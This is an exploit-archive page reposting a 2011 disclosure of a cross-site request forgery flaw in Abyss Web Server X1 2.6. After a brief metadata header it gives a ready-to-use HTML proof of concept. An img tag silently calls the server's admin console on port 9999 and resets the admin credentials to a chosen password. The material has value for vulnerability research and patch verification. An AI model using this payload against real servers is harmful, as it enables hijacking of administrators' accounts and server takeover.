Home / exploits Abyss Web Server X1 2.6 Cross Site Request Forgery
Posted on 27 March 2011
<!------------------------------------------------------------------------ # Software................Abyss Web Server X1 2.6 # Vulnerability...........Cross-site Request Forgery # Threat Level............Moderate (2/5) # Download................http://www.aprelium.com/ # Disclosure Date.........3/27/2011 # Tested On...............Windows Vista # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A cross-site request forgery vulnerability in Abyss Web Server X1 2.6 # can be exploited to change the admin password. # # # --PoC--> <html> <body> <img src="http://127.0.0.1:9999/console/credentials?%2fconsole%2fcredentials%2flogin=admin&%2fconsole%2fcredentials%2fpassword%2f%24pass1=Password1&%2fconsole%2fcredentials%2fpassword%2f%24pass2=Password1&%2fconsole%2fcredentials%2fbok=%c2%a0%c2%a0OK%c2%a0%c2%a0" /> </body> </html>
